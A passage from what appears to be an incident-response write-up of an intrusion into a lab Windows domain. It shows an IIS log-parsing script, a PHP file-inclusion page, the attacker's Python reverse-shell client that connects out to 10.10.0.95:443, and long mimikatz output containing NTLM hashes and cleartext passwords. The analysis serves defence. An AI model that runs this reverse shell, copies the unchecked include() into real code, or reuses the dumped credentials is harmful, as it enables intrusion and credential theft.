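                "payload_host": payload_host(include) if include else None,
                "command": command,
                "status": rec["sc-status"],
            })
    return findings


def summarize(findings):
    """Attacker-side indicators: requesting IPs, payload hosts, commands issued."""
    return {
        "client_ips": sorted({f["c_ip"] for f in findings}),
        "payload_hosts": sorted({f["payload_host"] for f in findings if f["payload_host"]}),
        "commands": [f["command"] for f in findings if f["command"]],
    }


if __name__ == "__main__":
    found = find_rfi(parse_w3c(SAMPLE_LOG))
    for f in found:
        print(f["time"], f["c_ip"], "->", f["s_ip"], f["include"], f["command"], f["status"])
    print(summarize(found))
```

Run against the real W3SVC1 files the same functions give the list of every command issued through vul.php and the single client address behind them; the sc-status 500 / sc-win32-status 258 entries (a 105-second time-taken) are the requests where main.exe blocked the PHP worker until the FastCGI timeout, which is itself a useful marker for a long-running child.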
I still haven't established how vul.php got onto the server. Here is its content:
<?php
// vulnerable_page.php
// Check if the 'page' parameter is set in the URL
if (isset($_GET['page'])) {
    $page = $_GET['page'];
    // Vulnerable to file inclusion
    include($page);
} else {
    echo "Welcome to the vulnerable page. Use the 'page' parameter to include a file.";
}
?>
Note that on Windows PHP treats a UNC path such as \\10.10.0.95\share\shell.txt as an ordinary filesystem path, not a URL wrapper, so include() fetches it over SMB even with allow_url_include=Off and allow_url_fopen=Off. The usual RFI hardening therefore does not stop this case; the fix is to map the page parameter onto an allowlist of local files and never pass user input to include() directly.
Based on the log, after a round of recon the attacker copied main.exe together with the two files below from the share \\10.10.0.95\share into C:\Windows\Temp (the copy commands at 08:14-08:17 on 27/08, repeated on 28/08):
client_connection.py
def connect_to_server(socket, handle_upload, handle_download, execute_command, subprocess, os):
    # Connect back to the operator's listener on 10.10.0.95:443
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(("10.10.0.95", 443))
    while True:
        # Each command is one recv(); "exit" closes the session
        command = client.recv(4096).decode()
        if command.lower() == "exit":
            client.close()
            break
        if command.startswith("upload"):
            handle_upload(command, client)
        elif command.startswith("download"):
            handle_download(command, client, os)
        else:
            execute_command(command, client, subprocess)
client_operations.py
def handle_upload(command, client):
    # "upload <filename>": write whatever arrives in the next recv() to that file
    _, filename = command.split(" ")
    with open(filename, "wb") as f:
        data = client.recv(4096)
        f.write(data)
    print("File uploaded.")

def handle_download(command, client, os):
    # "download <path>": send the file's bytes back to the operator
    filepath = command.split(" ")[1]
    if os.path.exists(filepath):
        with open(filepath, "rb") as f:
            client.send(f.read())
    else:
        client.send(b"File not found.")

def execute_command(command, client, subprocess):
    # Anything else is run through the shell and its output sent back
    output = subprocess.getoutput(command)
    client.send(output.encode())
VirusTotal relations for main.exe: https://www.virustotal.com/gui/file/b98e4403f3bfc66481179770eb4c7d5e55545e2ed1f7982d2d8bb163e878959c/relations
When run, main.exe opens a TCP connection to 10.10.0.95:443 (https), which matches the connect-back in client_connection.py; it is reasonable to conclude this is the reverse shell.
Based on the HTTP log and the EDR alerts, after 11:15:51 the commands were run through the main.exe reverse shell rather than vul.php, so from that point on the SIEM and EDR telemetry matter more than the IIS log. (IIS writes W3C logs in UTC by default; assuming the analyst's clock is UTC+7, 11:15:51 corresponds to the 04:15 UTC window on 28/08 in the log above.)
The attacker kept doing discovery (netstat, tasklist, ipconfig). After that I saw an attempt at lateral movement using PsExec, and ProcDump being used to dump LSASS for credentials. The IP it was aimed at belongs to AD (the domain controller).
Checking the server, the .dmp file was still there. After downloading it and reading it with mimikatz (sekurlsa::minidump, then sekurlsa::logonpasswords) we can see what the attacker got hold of:
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # dir
ERROR mimikatz_doLocal ; "dir" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz # ls
ERROR mimikatz_doLocal ; "ls" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
mimikatz # log lsass.txt
Using 'lsass.txt' for logfile : OK
mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.dmp' file for minidump...
Authentication Id : 0 ; 596451238 (00000000:238d1fa6)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/21/2024 11:15:47 AM
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 2904b55fb89731b631a1ef1523c0bd4c
* SHA1 : 01392a55fb560e396ec7ab69267d3581b49d1f08
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
kerberos :
* Username : PL-SERVER2$
* Domain : testlab.local
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
ssp :
credman :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 8/7/2024 5:58:37 PM
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 1042716341 (00000000:3e2696b5)
Session : RemoteInteractive from 4
User Name : dev
Domain : TESTLAB
Logon Server : AD
Logon Time : 8/28/2024 5:10:23 PM
SID : S-1-5-21-2645767256-3101023073-3015972391-1279
msv :
[00000003] Primary
* Username : dev
* Domain : TESTLAB
* NTLM : ea9fdbf576676540876a8c69c3af0965
* SHA1 : be407408759849b951f5490d7012d27336ba8f50
* DPAPI : 9869f7fcb993a0337cefec9b21a0fdfa
tspkg :
wdigest :
* Username : dev
* Domain : TESTLAB
* Password : VMT3st#123
kerberos :
* Username : dev
* Domain : TESTLAB.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 1042707356 (00000000:3e26739c)
Session : Interactive from 4
User Name : DWM-4
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/28/2024 5:10:23 PM
SID : S-1-5-90-0-4
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 2904b55fb89731b631a1ef1523c0bd4c
* SHA1 : 01392a55fb560e396ec7ab69267d3581b49d1f08
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
kerberos :
* Username : PL-SERVER2$
* Domain : testlab.local
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
ssp :
credman :
Authentication Id : 0 ; 652201751 (00000000:26dfcf17)
Session : RemoteInteractive from 3
User Name : administrator
Domain : TESTLAB
Logon Server : AD
Logon Time : 8/22/2024 1:43:22 PM
SID : S-1-5-21-2645767256-3101023073-3015972391-500
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 43023 (00000000:0000a80f)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 8/7/2024 5:58:33 PM
SID :
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 2904b55fb89731b631a1ef1523c0bd4c
* SHA1 : 01392a55fb560e396ec7ab69267d3581b49d1f08
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 596480889 (00000000:238d9379)
Session : RemoteInteractive from 2
User Name : domain.admin
Domain : TESTLAB
Logon Server : AD
Logon Time : 8/21/2024 11:15:55 AM
SID : S-1-5-21-2645767256-3101023073-3015972391-1105
msv :
[00000003] Primary
* Username : domain.admin
* Domain : TESTLAB
* NTLM : 618dbaf0bff2cd7e3e5458e9b754606f
* SHA1 : 0ca85d84678938da25703f216670f63ed62def5b
* DPAPI : 693e65efdba099fb726da3ba4db4e411
tspkg :
wdigest :
* Username : domain.admin
* Domain : TESTLAB
* Password : T3stT3@m@123
kerberos :
* Username : domain.admin
* Domain : TESTLAB.LOCAL
* Password : (null)
ssp :
credman :
[00000000]
* Username : PL-SERVER2\Administrator
* Domain : PL-SERVER2\Administrator
* Password : 123qweA@
[00000001]
* Username : domain.admin
* Domain : domain.admin
* Password : T3stT3@m#123
[00000002]
* Username : Administrator
* Domain : Administrator
* Password : 123qweA@
Authentication Id : 0 ; 596480654 (00000000:238d928e)
Session : RemoteInteractive from 2
User Name : domain.admin
Domain : TESTLAB
Logon Server : AD
Logon Time : 8/21/2024 11:15:55 AM
SID : S-1-5-21-2645767256-3101023073-3015972391-1105
msv :
[00000003] Primary
* Username : domain.admin
* Domain : TESTLAB
* NTLM : 618dbaf0bff2cd7e3e5458e9b754606f
* SHA1 : 0ca85d84678938da25703f216670f63ed62def5b
* DPAPI : 693e65efdba099fb726da3ba4db4e411
tspkg :
wdigest :
* Username : domain.admin
* Domain : TESTLAB
* Password : T3stT3@m@123
kerberos :
* Username : domain.admin
* Domain : TESTLAB.LOCAL
* Password : (null)
ssp :
credman :
[00000000]
* Username : PL-SERVER2\Administrator
* Domain : PL-SERVER2\Administrator
* Password : 123qweA@
[00000001]
* Username : domain.admin
* Domain : domain.admin
* Password : T3stT3@m#123
[00000002]
* Username : Administrator
* Domain : Administrator
* Password : 123qweA@
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 8/7/2024 5:58:34 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 64114 (00000000:0000fa72)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/7/2024 5:58:34 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 2904b55fb89731b631a1ef1523c0bd4c
* SHA1 : 01392a55fb560e396ec7ab69267d3581b49d1f08
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
kerberos :
* Username : PL-SERVER2$
* Domain : testlab.local
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
ssp :
credman :
Authentication Id : 0 ; 1037447963 (00000000:3dd6331b)
Session : Batch from 0
User Name : Administrator
Domain : PL-SERVER2
Logon Server : PL-SERVER2
Logon Time : 8/28/2024 2:52:59 PM
SID : S-1-5-21-2483637071-3450637983-2970284052-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : PL-SERVER2
* NTLM : d9d39508c90a3b55e95319c6fa45f524
* SHA1 : cc64c97d94919579f6091a6d401f5109d9a15c65
tspkg :
wdigest :
* Username : Administrator
* Domain : PL-SERVER2
* Password : 123qweA@
kerberos :
* Username : Administrator
* Domain : PL-SERVER2
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 596451255 (00000000:238d1fb7)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/21/2024 11:15:47 AM
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 1ab4b40ad1596522a1490bb2b77ab9bd
* SHA1 : 02743131a078108d2a11e396b48b63ebbe3fba7d
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : 18 48 ec 16 bb 31 f4 08 5f 20 34 00 b9 dd 92 fd 55 20 d8 a2 21 a4 cd ed ab 99 d2 c8 6e a3 7e 2b 1d f0 d7 0e 7f 66 76 0d b2 24 21 05 51 41 cd 53 41 1b f6 0c a1 81 81 17 81 6c 1e 44 78 e3 5a bc 81 c8 49 70 22 7b 2f 60 08 1d 76 27 ab 4a 4a 2f ac d1 c5 d1 75 15 2e f1 04 c0 eb 6d 01 be 93 06 06 7e 6e a8 f0 4d 23 52 aa e9 0f 24 55 8e a2 03 e6 5d 6f 48 ea 7f f9 2e 90 5e 09 a7 ae ca 1f 94 7b 4c ab 95 70 db 5f 7d 00 d3 43 77 3c 5a dc ce 17 2c 51 e5 83 ac 1d 5b 05 01 b7 fe c7 0b ff 99 6d 2c e7 b6 28 84 ca fb 53 8b d5 38 07 07 4c 6c 1c 0a cf 68 3d 98 8e 96 bb c2 10 40 3e ff 43 3a aa 71 72 bf d4 ae 4a 7d 15 dc e0 d3 e1 45 8f 70 08 a2 b4 31 e1 af d1 ba ce 9a 28 0c ac 05 c9 87 96 51 4b cc ce 43 f8 32 eb cf fc e5 35 e9 0f 70
kerberos :
* Username : PL-SERVER2$
* Domain : testlab.local
* Password : 18 48 ec 16 bb 31 f4 08 5f 20 34 00 b9 dd 92 fd 55 20 d8 a2 21 a4 cd ed ab 99 d2 c8 6e a3 7e 2b 1d f0 d7 0e 7f 66 76 0d b2 24 21 05 51 41 cd 53 41 1b f6 0c a1 81 81 17 81 6c 1e 44 78 e3 5a bc 81 c8 49 70 22 7b 2f 60 08 1d 76 27 ab 4a 4a 2f ac d1 c5 d1 75 15 2e f1 04 c0 eb 6d 01 be 93 06 06 7e 6e a8 f0 4d 23 52 aa e9 0f 24 55 8e a2 03 e6 5d 6f 48 ea 7f f9 2e 90 5e 09 a7 ae ca 1f 94 7b 4c ab 95 70 db 5f 7d 00 d3 43 77 3c 5a dc ce 17 2c 51 e5 83 ac 1d 5b 05 01 b7 fe c7 0b ff 99 6d 2c e7 b6 28 84 ca fb 53 8b d5 38 07 07 4c 6c 1c 0a cf 68 3d 98 8e 96 bb c2 10 40 3e ff 43 3a aa 71 72 bf d4 ae 4a 7d 15 dc e0 d3 e1 45 8f 70 08 a2 b4 31 e1 af d1 ba ce 9a 28 0c ac 05 c9 87 96 51 4b cc ce 43 f8 32 eb cf fc e5 35 e9 0f 70
ssp :
credman :
Authentication Id : 0 ; 596038116 (00000000:2386d1e4)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 8/21/2024 11:04:24 AM
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 2904b55fb89731b631a1ef1523c0bd4c
* SHA1 : 01392a55fb560e396ec7ab69267d3581b49d1f08
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
kerberos :
* Username : PL-SERVER2$
* Domain : TESTLAB.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : PL-SERVER2$
Domain : TESTLAB
Logon Server : (null)
Logon Time : 8/7/2024 5:58:32 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
kerberos :
* Username : pl-server2$
* Domain : TESTLAB.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 64145 (00000000:0000fa91)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/7/2024 5:58:34 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 1ab4b40ad1596522a1490bb2b77ab9bd
* SHA1 : 02743131a078108d2a11e396b48b63ebbe3fba7d
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : 18 48 ec 16 bb 31 f4 08 5f 20 34 00 b9 dd 92 fd 55 20 d8 a2 21 a4 cd ed ab 99 d2 c8 6e a3 7e 2b 1d f0 d7 0e 7f 66 76 0d b2 24 21 05 51 41 cd 53 41 1b f6 0c a1 81 81 17 81 6c 1e 44 78 e3 5a bc 81 c8 49 70 22 7b 2f 60 08 1d 76 27 ab 4a 4a 2f ac d1 c5 d1 75 15 2e f1 04 c0 eb 6d 01 be 93 06 06 7e 6e a8 f0 4d 23 52 aa e9 0f 24 55 8e a2 03 e6 5d 6f 48 ea 7f f9 2e 90 5e 09 a7 ae ca 1f 94 7b 4c ab 95 70 db 5f 7d 00 d3 43 77 3c 5a dc ce 17 2c 51 e5 83 ac 1d 5b 05 01 b7 fe c7 0b ff 99 6d 2c e7 b6 28 84 ca fb 53 8b d5 38 07 07 4c 6c 1c 0a cf 68 3d 98 8e 96 bb c2 10 40 3e ff 43 3a aa 71 72 bf d4 ae 4a 7d 15 dc e0 d3 e1 45 8f 70 08 a2 b4 31 e1 af d1 ba ce 9a 28 0c ac 05 c9 87 96 51 4b cc ce 43 f8 32 eb cf fc e5 35 e9 0f 70
kerberos :
* Username : PL-SERVER2$
* Domain : testlab.local
* Password : 18 48 ec 16 bb 31 f4 08 5f 20 34 00 b9 dd 92 fd 55 20 d8 a2 21 a4 cd ed ab 99 d2 c8 6e a3 7e 2b 1d f0 d7 0e 7f 66 76 0d b2 24 21 05 51 41 cd 53 41 1b f6 0c a1 81 81 17 81 6c 1e 44 78 e3 5a bc 81 c8 49 70 22 7b 2f 60 08 1d 76 27 ab 4a 4a 2f ac d1 c5 d1 75 15 2e f1 04 c0 eb 6d 01 be 93 06 06 7e 6e a8 f0 4d 23 52 aa e9 0f 24 55 8e a2 03 e6 5d 6f 48 ea 7f f9 2e 90 5e 09 a7 ae ca 1f 94 7b 4c ab 95 70 db 5f 7d 00 d3 43 77 3c 5a dc ce 17 2c 51 e5 83 ac 1d 5b 05 01 b7 fe c7 0b ff 99 6d 2c e7 b6 28 84 ca fb 53 8b d5 38 07 07 4c 6c 1c 0a cf 68 3d 98 8e 96 bb c2 10 40 3e ff 43 3a aa 71 72 bf d4 ae 4a 7d 15 dc e0 d3 e1 45 8f 70 08 a2 b4 31 e1 af d1 ba ce 9a 28 0c ac 05 c9 87 96 51 4b cc ce 43 f8 32 eb cf fc e5 35 e9 0f 70
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : PL-SERVER2$
Domain : TESTLAB
Logon Server : (null)
Logon Time : 8/7/2024 5:58:34 PM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 2904b55fb89731b631a1ef1523c0bd4c
* SHA1 : 01392a55fb560e396ec7ab69267d3581b49d1f08
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
kerberos :
* Username : pl-server2$
* Domain : TESTLAB.LOCAL
